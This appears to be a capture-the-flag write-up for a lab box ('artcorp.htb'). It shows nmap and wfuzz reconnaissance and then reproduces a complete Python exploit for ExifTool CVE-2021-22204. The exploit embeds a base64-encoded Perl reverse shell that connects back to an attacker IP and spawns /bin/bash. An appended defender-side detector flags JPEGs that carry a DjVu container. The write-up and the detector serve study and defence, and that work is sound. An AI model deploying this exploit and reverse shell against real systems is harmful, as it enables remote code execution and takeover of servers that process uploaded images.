# Final BOX
Maxence Giroult
---
[TOC]
## Discovery
```
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-20 07:12 EDT
Nmap scan report for 10.129.78.117
Host is up (0.021s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
## Analysis
```bash=
wfuzz -c -f sub-fighter -w subfuzz.txt -u 'http://artcorp.htb' -H "Host: FUZZ.artcorp.htb" --hw 290 | grep 200
```

We find that a subdomain exists, named "dev01".


Next, we notice the existence of the "metaview" page.

A simple web search for "POC Exiftool Vulnerability" leads to a CVE.
https://blog.convisoappsec.com/en/a-case-study-on-cve-2021-22204-exiftool-rce/
There we find this Python script, which generates a JPEG file to submit to "MetaView", since it is ExifTool that runs behind it.
```python=
#!/usr/bin/python3
#
# Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 and up allows arbitrary code execution when parsing the malicious image.
#
# This script installs all the required software and generates all the required files for creating an RCE image file to exploit CVE-2021-22204.
#
# Title: ExifTool CVE-2021-22204 - Remote Code Execution
# Date: 23/01/2022
# Written by: LazyTitan33
# https://github.com/LazyTitan33
# https://twitter.com/LazyTitan33
#
# Original research here: https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html
from PIL import Image
import subprocess
import base64
import os
ip = '10.142.0.253' # change this to your IP
port = 3535 # change this to your port
img = Image.new('RGB', (50, 50), color = 'red')
img.save('payload.jpg')
payload = b"(metadata \"\c${use MIME::Base64;eval(decode_base64('"
payload = payload + base64.b64encode( f"use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in({port},inet_aton('{ip}')))){{open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/bash -i');}};".encode() )
payload = payload + b"'))};\")"
payload_file = open('payload', 'w')
payload_file.write(payload.decode('utf-8'))
payload_file.close()
filename = "configfile"
content = '''%Image::ExifTool::UserDefined = (
    # All EXIF tags are added to the Main table, and WriteGroup is used to
    # specify where the tag is written (default is ExifIFD if not specified):
    'Image::ExifTool::Exif::Main' => {
        # Example 1.  EXIF:NewEXIFTag
        0xc51b => {
            Name => 'HasselbladExif',
            Writable => 'string',
            WriteGroup => 'IFD0',
        },
        # add more user-defined EXIF tags here...
    },
);
1;  #end%
'''
with open(filename, 'w') as f:
print(content, file=f)
subprocess.call(['sudo', 'apt', 'install', '-y', 'djvulibre-bin', 'exiftool'], stdout=open(os.devnull, 'wb'), stderr=open(os.devnull, 'wb'))
subprocess.call(['bzz', 'payload', 'payload.bzz'], stdout=open(os.devnull, 'wb'), stderr=open(os.devnull, 'wb'))
subprocess.call(['djvumake', 'exploit.djvu', "INFO=1,1", 'BGjp=/dev/null', 'ANTz=payload.bzz'], stdout=open(os.devnull, 'wb'), stderr=open(os.devnull, 'wb'))
subprocess.call(['exiftool', '-config', 'configfile', '-HasselbladExif<=exploit.djvu', 'payload.jpg'], stdout=open(os.devnull, 'wb'), stderr=open(os.devnull, 'wb'))
subprocess.call(['rm', 'configfile', 'payload.bzz', 'payload', 'exploit.djvu', 'payload.jpg_original'], stdout=open(os.devnull, 'wb'), stderr=open(os.devnull, 'wb'))
print(''',-.___,-.
\_/_ _\_/
)O_O( payload.jpg image is ready to be used.
{ (_) }
`-^-'
Art by Hayley Jane Wakenshaw''')
```
We start a listener on our machine, then upload the file to gain a shell.


Once the JPEG file is uploaded, we have a shell on the machine.
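As an added defender-side example, not part of the original writeup or of the exploit script above: the script hides a DjVu container (written by `djvumake`, with the payload in a bzz-compressed `ANTz` annotation chunk) inside a JPEG's EXIF data, so an upload handler that feeds files to ExifTool can refuse JPEGs carrying a DjVu container before parsing them. The sample bytes and the function name `find_embedded_djvu` are constructed for this example.

```python
# Upload-side check for a JPEG that embeds a DjVu container, the carrier used
# by the CVE-2021-22204 exploit above. Constructed example, not code from the
# writeup; a patched ExifTool is still the real fix.
JPEG_MAGIC = b"\xff\xd8\xff"
DJVU_MAGIC = b"AT&TFORM"        # DjVu files start with "AT&T" + IFF85 "FORM"
DJVU_FORM_TYPE = b"DJVU"        # single-page form type, follows the 4-byte length
DJVU_ANNOT_CHUNKS = (b"ANTa", b"ANTz")  # annotation chunks parsed by the vulnerable code


def find_embedded_djvu(data: bytes) -> dict:
    """Report whether a DjVu container is present and whether that is suspicious."""
    findings = {
        "is_jpeg": data.startswith(JPEG_MAGIC),
        "djvu_offset": None,
        "has_annotation_chunk": False,
        "suspicious": False,
    }
    off = data.find(DJVU_MAGIC)
    if off == -1:
        return findings
    # Layout: "AT&T" "FORM" <4-byte big-endian length> "DJVU" <chunks...>
    if data[off + 12:off + 16] != DJVU_FORM_TYPE:
        return findings
    findings["djvu_offset"] = off
    tail = data[off + 16:]
    findings["has_annotation_chunk"] = any(c in tail for c in DJVU_ANNOT_CHUNKS)
    # A JPEG should never carry a DjVu container; a plain .djvu file is not flagged here.
    findings["suspicious"] = findings["is_jpeg"]
    return findings


# Constructed samples (not real files): a bare JPEG header, and a JPEG whose
# EXIF segment carries a DjVu container with an ANTz annotation chunk.
SAMPLE_CLEAN = b"\xff\xd8\xff\xe1\x00\x10Exif\x00\x00" + b"\x00" * 32 + b"\xff\xd9"
_DJVU_CHUNKS = b"INFO\x00\x00\x00\x0a" + b"\x00" * 10 + b"ANTz\x00\x00\x00\x04" + b"\x00" * 4
SAMPLE_POLYGLOT = (
    b"\xff\xd8\xff\xe1\x00\x80Exif\x00\x00" + b"\x00" * 24
    + DJVU_MAGIC + (4 + len(_DJVU_CHUNKS)).to_bytes(4, "big")
    + DJVU_FORM_TYPE + _DJVU_CHUNKS + b"\xff\xd9"
)

if __name__ == "__main__":
    for name, blob in (("clean", SAMPLE_CLEAN), ("polyglot", SAMPLE_POLYGLOT)):
        print(name, find_embedded_djvu(blob))
```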
